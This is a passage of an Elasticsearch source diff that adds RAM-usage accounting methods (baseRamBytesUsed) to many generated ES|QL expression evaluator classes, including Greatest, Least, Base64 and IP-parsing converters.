This class is generated. 
Edit {@code X-InEvaluator.java.st} instead. */ public class InNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InNanosMillisEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java index 581ae82afbd21..e1ae5df99a83c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreatestBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock[] valuesBlocks) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { boolean[] valuesValues = new boolean[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java index 9926644551faf..acd37db346bd4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Arrays; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
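The Greatest*/Least* evaluators in this stretch of the patch apply the same accounting to a single values array: with no distinguished left-hand side, baseRamBytesUsed() is the shallow instance size plus the sum over values, so only the loop differs from the In* sketch above.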
*/ public final class GreatestBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -58,6 +61,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock[] valuesBlocks) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef[] valuesValues = new BytesRef[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java index a0129f7762379..8ebfc34a1664b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreatestDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock[] valuesBlocks) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { double[] valuesValues = new double[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java index 7b2d3e76a027b..11cd8c48f29d7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. 
Edit {@code EvaluatorImplementer} instead. */ public final class GreatestIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock[] valuesBlocks) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { int[] valuesValues = new int[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java index 94c6bbd934751..104c76ca1c1aa 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreatestLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock[] valuesBlocks) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { long[] valuesValues = new long[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java index 8bf830d030f63..62f8e9fbbb411 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. 
Edit {@code EvaluatorImplementer} instead. */ public final class LeastBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock[] valuesBlocks) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { boolean[] valuesValues = new boolean[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java index fe06aa9b5f32e..b70affe09ad30 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Arrays; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LeastBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -58,6 +61,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock[] valuesBlocks) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef[] valuesValues = new BytesRef[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java index 2c9c45e363d63..e3720f2dc78ff 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeastDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock[] valuesBlocks) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { double[] valuesValues = new double[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java index e14d83dafb951..80dd2a413d526 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. 
Edit {@code EvaluatorImplementer} instead. */ public final class LeastIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock[] valuesBlocks) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { int[] valuesValues = new int[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java index da2e98b59220f..9cf56741191d4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeastLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock[] valuesBlocks) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { long[] valuesValues = new long[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java index c4a22cc06900d..160b651ac10c8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java @@ -10,6 +10,7 @@ import java.util.function.Function; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.BytesRefBuilder; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. 
Edit {@code EvaluatorImplementer} instead. */ public final class FromBase64Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(FromBase64Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock fieldBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef fieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java index b4f732dab404f..7aa3503a7df56 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
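From here the patch moves to the unary case: conversion evaluators such as FromBase64Evaluator and the ParseIp* classes hold one input evaluator, so baseRamBytesUsed() is the shallow instance size plus that single child's estimate. Note that the ParseIp* evaluators' BreakingBytesRefBuilder scratch is not folded into the estimate, presumably because a breaker-tracked buffer is already accounted for by the circuit breaker rather than by this static baseline.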
*/ public final class ParseIpLeadingZerosAreDecimalEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ParseIpLeadingZerosAreDecimalEvaluator.class); + private final EvalOperator.ExpressionEvaluator string; private final BreakingBytesRefBuilder scratch; @@ -122,6 +125,13 @@ public void close() { Releasables.closeExpectNoException(string, scratch); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += string.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java index 009cdfa0a202e..177b0129553ab 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ParseIpLeadingZerosAreOctalEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ParseIpLeadingZerosAreOctalEvaluator.class); + private final EvalOperator.ExpressionEvaluator string; private final BreakingBytesRefBuilder scratch; @@ -122,6 +125,13 @@ public void close() { Releasables.closeExpectNoException(string, scratch); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += string.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java index f826ec26e8e99..623b917820d21 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. 
Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ParseIpLeadingZerosRejectedEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ParseIpLeadingZerosRejectedEvaluator.class); + private final EvalOperator.ExpressionEvaluator string; private final BreakingBytesRefBuilder scratch; @@ -122,6 +125,13 @@ public void close() { Releasables.closeExpectNoException(string, scratch); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += string.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java index 3fafd237030db..1f9f17cb44cdd 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java @@ -11,6 +11,7 @@ import java.util.function.Function; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.BytesRefBuilder; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ToBase64Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBase64Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -55,6 +58,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock fieldBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef fieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java index 3c92fe5fbe21a..96e380d6b3379 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. 
*/ public final class ToBooleanFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator d; public ToBooleanFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator d, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(d); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java index 6629645b8c807..11071c3d31539 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.IntBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToBooleanFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromIntEvaluator.class); + private final EvalOperator.ExpressionEvaluator i; public ToBooleanFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(i); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += i.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java index 62cd71b7684f8..0157e250756bc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java +++ 